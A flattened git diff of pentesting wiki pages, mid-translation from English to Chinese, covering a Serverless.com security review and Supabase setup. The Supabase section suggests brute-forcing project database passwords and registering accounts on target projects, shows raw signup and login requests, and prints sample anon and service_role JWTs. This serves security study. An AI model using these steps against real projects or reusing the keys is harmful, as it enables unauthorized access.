Yaml roleTemplate - ```yaml Description: This stack creates an IAM role that can be used by Serverless Framework for use in deployments. Resources: - SFRole: - Type: AWS::IAM::Role - Properties: - AssumeRolePolicyDocument: - Version: "2012-10-17" - Statement: - - Effect: Allow - Principal: - AWS: arn:aws:iam::486128539022:root - Action: - - sts:AssumeRole - Condition: - StringEquals: - sts:ExternalId: !Sub "ServerlessFramework-${OrgUid}" - Path: / - RoleName: !Ref RoleName - ManagedPolicyArns: - - arn:aws:iam::aws:policy/AdministratorAccess - ReporterFunction: - Type: Custom::ServerlessFrameworkReporter - Properties: - ServiceToken: "arn:aws:lambda:us-east-1:486128539022:function:sp-providers-stack-reporter-custom-resource-prod-tmen2ec" - OrgUid: !Ref OrgUid - RoleArn: !GetAtt SFRole.Arn - Alias: !Ref Alias +SFRole: +Type: AWS::IAM::Role +Properties: +AssumeRolePolicyDocument: +Version: "2012-10-17" +Statement: +- Effect: Allow +Principal: +AWS: arn:aws:iam::486128539022:root +Action: +- sts:AssumeRole +Condition: +StringEquals: +sts:ExternalId: !Sub "ServerlessFramework-${OrgUid}" +Path: / +RoleName: !Ref RoleName +ManagedPolicyArns: +- arn:aws:iam::aws:policy/AdministratorAccess +ReporterFunction: +Type: Custom::ServerlessFrameworkReporter +Properties: +ServiceToken: "arn:aws:lambda:us-east-1:486128539022:function:sp-providers-stack-reporter-custom-resource-prod-tmen2ec" +OrgUid: !Ref OrgUid +RoleArn: !GetAtt SFRole.Arn +Alias: !Ref Alias Outputs: - SFRoleArn: - Description: "ARN for the IAM Role used by Serverless Framework" - Value: !GetAtt SFRole.Arn +SFRoleArn: +Description: "ARN for the IAM Role used by Serverless Framework" +Value: !GetAtt SFRole.Arn Parameters: - OrgUid: - Description: Serverless Framework Org Uid - Type: String - Alias: - Description: Serverless Framework Provider Alias - Type: String - RoleName: - Description: Serverless Framework Role Name - Type: String +OrgUid: +Description: Serverless Framework Org Uid +Type: String +Alias: +Description: Serverless Framework Provider Alias +Type: String +RoleName: +Description: Serverless Framework Role Name +Type: String ``` -
-Trust Relationship - +信任关系 ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::486128539022:root" - }, - "Action": "sts:AssumeRole", - "Condition": { - "StringEquals": { - "sts:ExternalId": "ServerlessFramework-7bf7ddef-e1bf-43eb-a111-4d43e0894ccb" - } - } - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam::486128539022:root" +}, +"Action": "sts:AssumeRole", +"Condition": { +"StringEquals": { +"sts:ExternalId": "ServerlessFramework-7bf7ddef-e1bf-43eb-a111-4d43e0894ccb" +} +} +} +] } ``` -
-5. The tutorial asks to create the file `createCustomer.js` which will basically create a new API endpoint handled by the new JS file and asks to modify the `serverless.yml` file to make it generate a **new DynamoDB table**, define an **environment variable**, the role that will be using the generated lambdas. +5. 教程要求创建文件 `createCustomer.js`,该文件基本上会创建一个由新 JS 文件处理的新 API 端点,并要求修改 `serverless.yml` 文件以生成一个 **新的 DynamoDB 表**,定义一个 **环境变量**,以及将使用生成的 lambdas 的角色。 {{#tabs }} {{#tab name="createCustomer.js" }} - ```javascript "use strict" const AWS = require("aws-sdk") module.exports.createCustomer = async (event) => { - const body = JSON.parse(Buffer.from(event.body, "base64").toString()) - const dynamoDb = new AWS.DynamoDB.DocumentClient() - const putParams = { - TableName: process.env.DYNAMODB_CUSTOMER_TABLE, - Item: { - primary_key: body.name, - email: body.email, - }, - } - await dynamoDb.put(putParams).promise() - return { - statusCode: 201, - } +const body = JSON.parse(Buffer.from(event.body, "base64").toString()) +const dynamoDb = new AWS.DynamoDB.DocumentClient() +const putParams = { +TableName: process.env.DYNAMODB_CUSTOMER_TABLE, +Item: { +primary_key: body.name, +email: body.email, +}, +} +await dynamoDb.put(putParams).promise() +return { +statusCode: 201, +} } ``` - {{#endtab }} {{#tab name="serverless.yml" }} - ```yaml # "org" ensures this Service is used with the correct Serverless Framework Access Key. org: testing12342 @@ -475,388 +434,379 @@ app: tutorialapp service: Tutorial provider: - name: aws - runtime: nodejs20.x - environment: - DYNAMODB_CUSTOMER_TABLE: ${self:service}-customerTable-${sls:stage} - iam: - role: - statements: - - Effect: "Allow" - Action: - - "dynamodb:PutItem" - - "dynamodb:Get*" - - "dynamodb:Scan*" - - "dynamodb:UpdateItem" - - "dynamodb:DeleteItem" - Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage} +name: aws +runtime: nodejs20.x +environment: +DYNAMODB_CUSTOMER_TABLE: ${self:service}-customerTable-${sls:stage} +iam: +role: +statements: +- Effect: "Allow" +Action: +- "dynamodb:PutItem" +- "dynamodb:Get*" +- "dynamodb:Scan*" +- "dynamodb:UpdateItem" +- "dynamodb:DeleteItem" +Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage} functions: - hello: - handler: handler.hello - events: - - httpApi: - path: / - method: get - createCustomer: - handler: createCustomer.createCustomer - events: - - httpApi: - path: / - method: post +hello: +handler: handler.hello +events: +- httpApi: +path: / +method: get +createCustomer: +handler: createCustomer.createCustomer +events: +- httpApi: +path: / +method: post resources: - Resources: - CustomerTable: - Type: AWS::DynamoDB::Table - Properties: - AttributeDefinitions: - - AttributeName: primary_key - AttributeType: S - BillingMode: PAY_PER_REQUEST - KeySchema: - - AttributeName: primary_key - KeyType: HASH - TableName: ${self:service}-customerTable-${sls:stage} +Resources: +CustomerTable: +Type: AWS::DynamoDB::Table +Properties: +AttributeDefinitions: +- AttributeName: primary_key +AttributeType: S +BillingMode: PAY_PER_REQUEST +KeySchema: +- AttributeName: primary_key +KeyType: HASH +TableName: ${self:service}-customerTable-${sls:stage} ``` - {{#endtab }} {{#endtabs }} -6. Deploy it running **`serverless deploy`** - 1. The deployment will be performed via a CloudFormation Stack - 2. Note that the **lambdas are exposed via API gateway** and not via direct URLs -7. **Test it** - 1. The previous step will print the **URLs** where your API endpoints lambda functions have been deployed +6. 部署它运行 **`serverless deploy`** +1. 部署将通过 CloudFormation Stack 执行 +2. 请注意,**lambdas 通过 API gateway 暴露,而不是通过直接 URL** +7. **测试它** +1. 上一步将打印出 **URLs**,您的 API 端点 lambda 函数已部署在这些地址 -## Security Review of Serverless.com +## Serverless.com 的安全审查 -### **Misconfigured IAM Roles and Permissions** +### **错误配置的 IAM 角色和权限** -Overly permissive IAM roles can grant unauthorized access to cloud resources, leading to data breaches or resource manipulation. +过于宽松的 IAM 角色可能会授予对云资源的未经授权访问,从而导致数据泄露或资源操控。 -When no permissions are specified for the a Lambda function, a role with permissions only to generate logs will be created, like: +当没有为 Lambda 函数指定权限时,将创建一个仅具有生成日志权限的角色,如下所示:
-Minimum lambda permissions - +最低 lambda 权限 ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Action": [ - "logs:CreateLogStream", - "logs:CreateLogGroup", - "logs:TagResource" - ], - "Resource": [ - "arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/jito-cranker-scripts-dev*:*" - ], - "Effect": "Allow" - }, - { - "Action": ["logs:PutLogEvents"], - "Resource": [ - "arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/jito-cranker-scripts-dev*:*:*" - ], - "Effect": "Allow" - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Action": [ +"logs:CreateLogStream", +"logs:CreateLogGroup", +"logs:TagResource" +], +"Resource": [ +"arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/jito-cranker-scripts-dev*:*" +], +"Effect": "Allow" +}, +{ +"Action": ["logs:PutLogEvents"], +"Resource": [ +"arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/jito-cranker-scripts-dev*:*:*" +], +"Effect": "Allow" +} +] } ``` -
-#### **Mitigation Strategies** +#### **缓解策略** -- **Principle of Least Privilege:** Assign only necessary permissions to each function. - - ```yaml - provider: - [...] - iam: - role: - statements: - - Effect: 'Allow' - Action: - - 'dynamodb:PutItem' - - 'dynamodb:Get*' - - 'dynamodb:Scan*' - - 'dynamodb:UpdateItem' - - 'dynamodb:DeleteItem' - Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage} - ``` - -- **Use Separate Roles:** Differentiate roles based on function requirements. - ---- - -### **Insecure Secrets and Configuration Management** - -Storing sensitive information (e.g., API keys, database credentials) directly in **`serverless.yml`** or code can lead to exposure if repositories are compromised. - -The **recommended** way to store environment variables in **`serverless.yml`** file from serverless.com (at the time of this writing) is to use the `ssm` or `s3` providers, which allows to get the **environment values from these sources at deployment time** and **configure** the **lambdas** environment variables with the **text clear of the values**! - -> [!CAUTION] -> Therefore, anyone with permissions to read the lambdas configuration inside AWS will be able to **access all these environment variables in clear text!** - -For example, the following example will use SSM to get an environment variable: +- **最小权限原则:** 仅为每个函数分配必要的权限。 ```yaml provider: - environment: - DB_PASSWORD: ${ssm:/aws/reference/secretsmanager/my-db-password~true} +[...] +iam: +role: +statements: +- Effect: 'Allow' +Action: +- 'dynamodb:PutItem' +- 'dynamodb:Get*' +- 'dynamodb:Scan*' +- 'dynamodb:UpdateItem' +- 'dynamodb:DeleteItem' +Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage} ``` -And even if this prevents hardcoding the environment variable value in the **`serverless.yml`** file, the value will be obtained at deployment time and will be **added in clear text inside the lambda environment variable**. +- **使用单独的角色:** 根据函数需求区分角色。 + +--- + +### **不安全的秘密和配置管理** + +将敏感信息(例如,API 密钥、数据库凭据)直接存储在 **`serverless.yml`** 或代码中,如果存储库被攻破,可能会导致泄露。 + +在 **`serverless.yml`** 文件中存储环境变量的 **推荐** 方法是使用 `ssm` 或 `s3` 提供者,这允许在部署时从这些来源获取 **环境值** 并 **配置** **lambdas** 的环境变量,**文本中不包含值**! + +> [!CAUTION] +> 因此,任何有权限读取 AWS 中 lambdas 配置的人都将能够 **以明文访问所有这些环境变量!** + +例如,以下示例将使用 SSM 获取一个环境变量: +```yaml +provider: +environment: +DB_PASSWORD: ${ssm:/aws/reference/secretsmanager/my-db-password~true} +``` +And even if this prevents hardcoding the environment variable value in the **`serverless.yml`** file, the value will be obtained at deployment time and will be **以明文形式添加到lambda环境变量中**。 > [!TIP] -> The recommended way to store environment variables using serveless.com would be to **store it in a AWS secret** and just store the secret name in the environment variable and the **lambda code should gather it**. +> 使用serveless.com存储环境变量的推荐方法是**将其存储在AWS秘密中**,并仅在环境变量中存储秘密名称,**lambda代码应收集它**。 -#### **Mitigation Strategies** +#### **缓解策略** -- **Secrets Manager Integration:** Use services like **AWS Secrets Manager.** -- **Encrypted Variables:** Leverage Serverless Framework’s encryption features for sensitive data. -- **Access Controls:** Restrict access to secrets based on roles. +- **秘密管理器集成:** 使用像**AWS Secrets Manager**这样的服务。 +- **加密变量:** 利用Serverless Framework的加密功能来保护敏感数据。 +- **访问控制:** 根据角色限制对秘密的访问。 --- -### **Vulnerable Code and Dependencies** +### **脆弱的代码和依赖项** -Outdated or insecure dependencies can introduce vulnerabilities, while improper input handling may lead to code injection attacks. +过时或不安全的依赖项可能引入漏洞,而不当的输入处理可能导致代码注入攻击。 -#### **Mitigation Strategies** +#### **缓解策略** -- **Dependency Management:** Regularly update dependencies and scan for vulnerabilities. +- **依赖管理:** 定期更新依赖项并扫描漏洞。 - ```yaml - plugins: - - serverless-webpack - - serverless-plugin-snyk - ``` +```yaml +plugins: +- serverless-webpack +- serverless-plugin-snyk +``` -- **Input Validation:** Implement strict validation and sanitization of all inputs. -- **Code Reviews:** Conduct thorough reviews to identify security flaws. -- **Static Analysis:** Use tools to detect vulnerabilities in the codebase. +- **输入验证:** 实施严格的验证和清理所有输入。 +- **代码审查:** 进行彻底的审查以识别安全缺陷。 +- **静态分析:** 使用工具检测代码库中的漏洞。 --- -### **Inadequate Logging and Monitoring** +### **日志和监控不足** -Without proper logging and monitoring, malicious activities may go undetected, delaying incident response. +没有适当的日志记录和监控,恶意活动可能会被忽视,从而延迟事件响应。 -#### **Mitigation Strategies** +#### **缓解策略** -- **Centralized Logging:** Aggregate logs using services like **AWS CloudWatch** or **Datadog**. +- **集中日志记录:** 使用像**AWS CloudWatch**或**Datadog**这样的服务聚合日志。 - ```yaml - plugins: - - serverless-plugin-datadog - ``` +```yaml +plugins: +- serverless-plugin-datadog +``` -- **Enable Detailed Logging:** Capture essential information without exposing sensitive data. -- **Set Up Alerts:** Configure alerts for suspicious activities or anomalies. -- **Regular Monitoring:** Continuously monitor logs and metrics for potential security incidents. +- **启用详细日志记录:** 捕获重要信息而不暴露敏感数据。 +- **设置警报:** 配置对可疑活动或异常的警报。 +- **定期监控:** 持续监控日志和指标以发现潜在的安全事件。 --- -### **Insecure API Gateway Configurations** +### **不安全的API网关配置** -Open or improperly secured APIs can be exploited for unauthorized access, Denial of Service (DoS) attacks, or cross-site attacks. +开放或不当保护的API可能被利用进行未经授权的访问、拒绝服务(DoS)攻击或跨站攻击。 -#### **Mitigation Strategies** +#### **缓解策略** -- **Authentication and Authorization:** Implement robust mechanisms like OAuth, API keys, or JWT. +- **身份验证和授权:** 实施强大的机制,如OAuth、API密钥或JWT。 - ```yaml - functions: - hello: - handler: handler.hello - events: - - http: - path: hello - method: get - authorizer: aws_iam - ``` +```yaml +functions: +hello: +handler: handler.hello +events: +- http: +path: hello +method: get +authorizer: aws_iam +``` -- **Rate Limiting and Throttling:** Prevent abuse by limiting request rates. +- **速率限制和节流:** 通过限制请求速率来防止滥用。 - ```yaml - provider: - apiGateway: - throttle: - burstLimit: 200 - rateLimit: 100 - ``` +```yaml +provider: +apiGateway: +throttle: +burstLimit: 200 +rateLimit: 100 +``` -- **Secure CORS Configuration:** Restrict allowed origins, methods, and headers. +- **安全的CORS配置:** 限制允许的来源、方法和头部。 - ```yaml - functions: - hello: - handler: handler.hello - events: - - http: - path: hello - method: get - cors: - origin: https://yourdomain.com - headers: - - Content-Type - ``` +```yaml +functions: +hello: +handler: handler.hello +events: +- http: +path: hello +method: get +cors: +origin: https://yourdomain.com +headers: +- Content-Type +``` -- **Use Web Application Firewalls (WAF):** Filter and monitor HTTP requests for malicious patterns. +- **使用Web应用防火墙(WAF):** 过滤和监控HTTP请求以检测恶意模式。 --- -### **Insufficient Function Isolation** +### **功能隔离不足** -Shared resources and inadequate isolation can lead to privilege escalations or unintended interactions between functions. +共享资源和不充分的隔离可能导致权限提升或函数之间的意外交互。 -#### **Mitigation Strategies** +#### **缓解策略** -- **Isolate Functions:** Assign distinct resources and IAM roles to ensure independent operation. -- **Resource Partitioning:** Use separate databases or storage buckets for different functions. -- **Use VPCs:** Deploy functions within Virtual Private Clouds for enhanced network isolation. +- **隔离功能:** 分配不同的资源和IAM角色以确保独立操作。 +- **资源分区:** 为不同的功能使用单独的数据库或存储桶。 +- **使用VPC:** 在虚拟私有云中部署功能以增强网络隔离。 - ```yaml - provider: - vpc: - securityGroupIds: - - sg-xxxxxxxx - subnetIds: - - subnet-xxxxxx - ``` +```yaml +provider: +vpc: +securityGroupIds: +- sg-xxxxxxxx +subnetIds: +- subnet-xxxxxx +``` -- **Limit Function Permissions:** Ensure functions cannot access or interfere with each other’s resources unless explicitly required. +- **限制功能权限:** 确保功能不能访问或干扰彼此的资源,除非明确需要。 --- -### **Inadequate Data Protection** +### **数据保护不足** -Unencrypted data at rest or in transit can be exposed, leading to data breaches or tampering. +静态或传输中的未加密数据可能会被暴露,导致数据泄露或篡改。 -#### **Mitigation Strategies** +#### **缓解策略** -- **Encrypt Data at Rest:** Utilize cloud service encryption features. +- **加密静态数据:** 利用云服务的加密功能。 - ```yaml - resources: - Resources: - MyDynamoDBTable: - Type: AWS::DynamoDB::Table - Properties: - SSESpecification: - SSEEnabled: true - ``` +```yaml +resources: +Resources: +MyDynamoDBTable: +Type: AWS::DynamoDB::Table +Properties: +SSESpecification: +SSEEnabled: true +``` -- **Encrypt Data in Transit:** Use HTTPS/TLS for all data transmissions. -- **Secure API Communication:** Enforce encryption protocols and validate certificates. -- **Manage Encryption Keys Securely:** Use managed key services and rotate keys regularly. +- **加密传输中的数据:** 对所有数据传输使用HTTPS/TLS。 +- **安全的API通信:** 强制执行加密协议并验证证书。 +- **安全管理加密密钥:** 使用托管密钥服务并定期轮换密钥。 --- -### **Lack of Proper Error Handling** +### **缺乏适当的错误处理** -Detailed error messages can leak sensitive information about the infrastructure or codebase, while unhandled exceptions may lead to application crashes. +详细的错误消息可能泄露有关基础设施或代码库的敏感信息,而未处理的异常可能导致应用程序崩溃。 -#### **Mitigation Strategies** +#### **缓解策略** -- **Generic Error Messages:** Avoid exposing internal details in error responses. +- **通用错误消息:** 避免在错误响应中暴露内部细节。 - ```javascript - javascriptCopy code// Example in Node.js - exports.hello = async (event) => { - try { - // Function logic - } catch (error) { - console.error(error); - return { - statusCode: 500, - body: JSON.stringify({ message: 'Internal Server Error' }), - }; - } - }; - ``` +```javascript +javascriptCopy code// Example in Node.js +exports.hello = async (event) => { +try { +// Function logic +} catch (error) { +console.error(error); +return { +statusCode: 500, +body: JSON.stringify({ message: 'Internal Server Error' }), +}; +} +}; +``` -- **Centralized Error Handling:** Manage and sanitize errors consistently across all functions. -- **Monitor and Log Errors:** Track and analyze errors internally without exposing details to end-users. +- **集中错误处理:** 在所有功能中一致地管理和清理错误。 +- **监控和记录错误:** 跟踪和分析内部错误,而不向最终用户暴露细节。 --- -### **Insecure Deployment Practices** +### **不安全的部署实践** -Exposed deployment configurations or unauthorized access to CI/CD pipelines can lead to malicious code deployments or misconfigurations. +暴露的部署配置或对CI/CD管道的未经授权访问可能导致恶意代码部署或配置错误。 -#### **Mitigation Strategies** +#### **缓解策略** -- **Secure CI/CD Pipelines:** Implement strict access controls, multi-factor authentication (MFA), and regular audits. -- **Store Configuration Securely:** Keep deployment files free from hardcoded secrets and sensitive data. -- **Use Infrastructure as Code (IaC) Security Tools:** Employ tools like **Checkov** or **Terraform Sentinel** to enforce security policies. -- **Immutable Deployments:** Prevent unauthorized changes post-deployment by adopting immutable infrastructure practices. +- **安全的CI/CD管道:** 实施严格的访问控制、多因素身份验证(MFA)和定期审计。 +- **安全存储配置:** 确保部署文件不包含硬编码的秘密和敏感数据。 +- **使用基础设施即代码(IaC)安全工具:** 使用像**Checkov**或**Terraform Sentinel**这样的工具来强制执行安全策略。 +- **不可变部署:** 通过采用不可变基础设施实践来防止部署后未经授权的更改。 --- -### **Vulnerabilities in Plugins and Extensions** +### **插件和扩展中的漏洞** -Using unvetted or malicious third-party plugins can introduce vulnerabilities into your serverless applications. +使用未经审查或恶意的第三方插件可能会将漏洞引入您的无服务器应用程序。 -#### **Mitigation Strategies** +#### **缓解策略** -- **Vet Plugins Thoroughly:** Assess the security of plugins before integration, favoring those from reputable sources. -- **Limit Plugin Usage:** Use only necessary plugins to minimize the attack surface. -- **Monitor Plugin Updates:** Keep plugins updated to benefit from security patches. -- **Isolate Plugin Environments:** Run plugins in isolated environments to contain potential compromises. +- **彻底审查插件:** 在集成之前评估插件的安全性,优先选择来自信誉良好的来源的插件。 +- **限制插件使用:** 仅使用必要的插件以最小化攻击面。 +- **监控插件更新:** 保持插件更新以受益于安全补丁。 +- **隔离插件环境:** 在隔离环境中运行插件以限制潜在的妥协。 --- -### **Exposure of Sensitive Endpoints** +### **敏感端点的暴露** -Publicly accessible functions or unrestricted APIs can be exploited for unauthorized operations. +公开可访问的功能或不受限制的API可能被利用进行未经授权的操作。 -#### **Mitigation Strategies** +#### **缓解策略** -- **Restrict Function Access:** Use VPCs, security groups, and firewall rules to limit access to trusted sources. -- **Implement Robust Authentication:** Ensure all exposed endpoints require proper authentication and authorization. -- **Use API Gateways Securely:** Configure API Gateways to enforce security policies, including input validation and rate limiting. -- **Disable Unused Endpoints:** Regularly review and disable any endpoints that are no longer in use. +- **限制功能访问:** 使用VPC、安全组和防火墙规则限制对受信任来源的访问。 +- **实施强大的身份验证:** 确保所有公开的端点都需要适当的身份验证和授权。 +- **安全使用API网关:** 配置API网关以强制执行安全策略,包括输入验证和速率限制。 +- **禁用未使用的端点:** 定期审查并禁用任何不再使用的端点。 --- -### **Excessive Permissions for Team Members and External Collaborators** +### **团队成员和外部合作者的权限过大** -Granting excessive permissions to team members and external collaborators can lead to unauthorized access, data breaches, and misuse of resources. This risk is heightened in environments where multiple individuals have varying levels of access, increasing the attack surface and potential for insider threats. +向团队成员和外部合作者授予过多权限可能导致未经授权的访问、数据泄露和资源滥用。在多个个人具有不同级别访问权限的环境中,这种风险会加大,增加攻击面和内部威胁的潜力。 -#### **Mitigation Strategies** +#### **缓解策略** -- **Principle of Least Privilege:** Ensure that team members and collaborators have only the permissions necessary to perform their tasks. +- **最小权限原则:** 确保团队成员和合作者仅拥有执行其任务所需的权限。 --- -### **Access Keys and License Keys Security** +### **访问密钥和许可证密钥安全** -**Access Keys** and **License Keys** are critical credentials used to authenticate and authorize interactions with the Serverless Framework CLI. +**访问密钥**和**许可证密钥**是用于验证和授权与Serverless Framework CLI交互的关键凭据。 -- **License Keys:** They are Unique identifiers required for authenticating access to Serverless Framework Version 4 which allows to login via CLI. -- **Access Keys:** Credentials that allow the Serverless Framework CLI to authenticate with the Serverless Framework Dashboard. When login with `serverless` cli an access key will be **generated and stored in the laptop**. You can also set it as an environment variable named `SERVERLESS_ACCESS_KEY`. +- **许可证密钥:** 它们是用于验证对Serverless Framework版本4的访问的唯一标识符,允许通过CLI登录。 +- **访问密钥:** 允许Serverless Framework CLI与Serverless Framework Dashboard进行身份验证的凭据。当使用`serverless` cli登录时,访问密钥将**生成并存储在笔记本电脑中**。您还可以将其设置为名为`SERVERLESS_ACCESS_KEY`的环境变量。 -#### **Security Risks** +#### **安全风险** -1. **Exposure Through Code Repositories:** - - Hardcoding or accidentally committing Access Keys and License Keys to version control systems can lead to unauthorized access. -2. **Insecure Storage:** - - Storing keys in plaintext within environment variables or configuration files without proper encryption increases the likelihood of leakage. -3. **Improper Distribution:** - - Sharing keys through unsecured channels (e.g., email, chat) can result in interception by malicious actors. -4. **Lack of Rotation:** - - Not regularly rotating keys extends the exposure period if keys are compromised. -5. **Excessive Permissions:** - - Keys with broad permissions can be exploited to perform unauthorized actions across multiple resources. +1. **通过代码库暴露:** +- 硬编码或意外提交访问密钥和许可证密钥到版本控制系统可能导致未经授权的访问。 +2. **不安全的存储:** +- 在环境变量或配置文件中以明文存储密钥而没有适当的加密,增加了泄露的可能性。 +3. **不当分发:** +- 通过不安全的渠道(例如电子邮件、聊天)共享密钥可能导致被恶意行为者拦截。 +4. **缺乏轮换:** +- 不定期轮换密钥会延长密钥被泄露的暴露期。 +5. **权限过大:** +- 拥有广泛权限的密钥可能被利用在多个资源上执行未经授权的操作。 {{#include ../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/supabase-security.md b/src/pentesting-ci-cd/supabase-security.md index 6fa6219f8..7e63051f9 100644 --- a/src/pentesting-ci-cd/supabase-security.md +++ b/src/pentesting-ci-cd/supabase-security.md @@ -2,49 +2,48 @@ {{#include ../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -As per their [**landing page**](https://supabase.com/): Supabase is an open source Firebase alternative. Start your project with a Postgres database, Authentication, instant APIs, Edge Functions, Realtime subscriptions, Storage, and Vector embeddings. +根据他们的 [**登陆页面**](https://supabase.com/): Supabase 是一个开源的 Firebase 替代品。使用 Postgres 数据库、身份验证、即时 API、边缘函数、实时订阅、存储和向量嵌入开始您的项目。 -### Subdomain +### 子域名 -Basically when a project is created, the user will receive a supabase.co subdomain like: **`jnanozjdybtpqgcwhdiz.supabase.co`** +基本上,当创建一个项目时,用户将收到一个 supabase.co 子域名,如:**`jnanozjdybtpqgcwhdiz.supabase.co`** -## **Database configuration** +## **数据库配置** > [!TIP] -> **This data can be accessed from a link like `https://supabase.com/dashboard/project//settings/database`** +> **可以通过链接 `https://supabase.com/dashboard/project//settings/database` 访问这些数据** -This **database** will be deployed in some AWS region, and in order to connect to it it would be possible to do so connecting to: `postgres://postgres.jnanozjdybtpqgcwhdiz:[YOUR-PASSWORD]@aws-0-us-west-1.pooler.supabase.com:5432/postgres` (this was crated in us-west-1).\ -The password is a **password the user put** previously. +这个 **数据库** 将部署在某个 AWS 区域,为了连接到它,可以通过以下方式连接:`postgres://postgres.jnanozjdybtpqgcwhdiz:[YOUR-PASSWORD]@aws-0-us-west-1.pooler.supabase.com:5432/postgres`(这是在 us-west-1 创建的)。\ +密码是用户之前设置的 **密码**。 -Therefore, as the subdomain is a known one and it's used as username and the AWS regions are limited, it might be possible to try to **brute force the password**. +因此,由于子域名是已知的,并且它被用作用户名,而 AWS 区域是有限的,可能可以尝试 **暴力破解密码**。 -This section also contains options to: +本节还包含以下选项: -- Reset the database password -- Configure connection pooling -- Configure SSL: Reject plan-text connections (by default they are enabled) -- Configure Disk size -- Apply network restrictions and bans +- 重置数据库密码 +- 配置连接池 +- 配置 SSL:拒绝明文连接(默认情况下启用) +- 配置磁盘大小 +- 应用网络限制和禁令 -## API Configuration +## API 配置 > [!TIP] -> **This data can be accessed from a link like `https://supabase.com/dashboard/project//settings/api`** +> **可以通过链接 `https://supabase.com/dashboard/project//settings/api` 访问这些数据** -The URL to access the supabase API in your project is going to be like: `https://jnanozjdybtpqgcwhdiz.supabase.co`. +访问您项目中 supabase API 的 URL 将类似于:`https://jnanozjdybtpqgcwhdiz.supabase.co`。 -### anon api keys +### 匿名 API 密钥 -It'll also generate an **anon API key** (`role: "anon"`), like: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk` that the application will need to use in order to contact the API key exposed in our example in +它还将生成一个 **匿名 API 密钥** (`role: "anon"`),如:`eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk`,应用程序需要使用它来联系我们示例中暴露的 API 密钥。 -It's possible to find the API REST to contact this API in the [**docs**](https://supabase.com/docs/reference/self-hosting-auth/returns-the-configuration-settings-for-the-gotrue-server), but the most interesting endpoints would be: +可以在 [**文档**](https://supabase.com/docs/reference/self-hosting-auth/returns-the-configuration-settings-for-the-gotrue-server) 中找到联系此 API 的 API REST,但最有趣的端点将是:
-Signup (/auth/v1/signup) - +注册 (/auth/v1/signup) ``` POST /auth/v1/signup HTTP/2 Host: id.io.net @@ -69,13 +68,11 @@ Priority: u=1, i {"email":"test@exmaple.com","password":"SomeCOmplexPwd239."} ``` -
-Login (/auth/v1/token?grant_type=password) - +登录 (/auth/v1/token?grant_type=password) ``` POST /auth/v1/token?grant_type=password HTTP/2 Host: hypzbtgspjkludjcnjxl.supabase.co @@ -100,68 +97,63 @@ Priority: u=1, i {"email":"test@exmaple.com","password":"SomeCOmplexPwd239."} ``` -
-So, whenever you discover a client using supabase with the subdomain they were granted (it's possible that a subdomain of the company has a CNAME over their supabase subdomain), you might try to **create a new account in the platform using the supabase API**. +所以,每当你发现一个客户使用 supabase 和他们被授予的子域名时(公司的一个子域名可能有一个 CNAME 指向他们的 supabase 子域名),你可以尝试 **使用 supabase API 创建一个新账户**。 ### secret / service_role api keys -A secret API key will also be generated with **`role: "service_role"`**. This API key should be secret because it will be able to bypass **Row Level Security**. +一个秘密 API 密钥也会生成 **`role: "service_role"`**。这个 API 密钥应该是秘密的,因为它能够绕过 **行级安全**。 -The API key looks like this: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6InNlcnZpY2Vfcm9sZSIsImlhdCI6MTcxNDk5MjcxOSwiZXhwIjoyMDMwNTY4NzE5fQ.0a8fHGp3N_GiPq0y0dwfs06ywd-zhTwsm486Tha7354` +API 密钥看起来像这样: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6InNlcnZpY2Vfcm9sZSIsImlhdCI6MTcxNDk5MjcxOSwiZXhwIjoyMDMwNTY4NzE5fQ.0a8fHGp3N_GiPq0y0dwfs06ywd-zhTwsm486Tha7354` ### JWT Secret -A **JWT Secret** will also be generate so the application can **create and sign custom JWT tokens**. +一个 **JWT Secret** 也会被生成,以便应用程序可以 **创建和签署自定义 JWT 令牌**。 -## Authentication +## 认证 -### Signups +### 注册 > [!TIP] -> By **default** supabase will allow **new users to create accounts** on your project by using the previously mentioned API endpoints. +> 默认情况下,supabase 将允许 **新用户在你的项目中创建账户**,通过使用之前提到的 API 端点。 -However, these new accounts, by default, **will need to validate their email address** to be able to login into the account. It's possible to enable **"Allow anonymous sign-ins"** to allow people to login without verifying their email address. This could grant access to **unexpected data** (they get the roles `public` and `authenticated`).\ -This is a very bad idea because supabase charges per active user so people could create users and login and supabase will charge for those: +然而,这些新账户默认情况下 **需要验证他们的电子邮件地址** 才能登录账户。可以启用 **“允许匿名登录”** 以允许人们在不验证电子邮件地址的情况下登录。这可能会授予对 **意外数据** 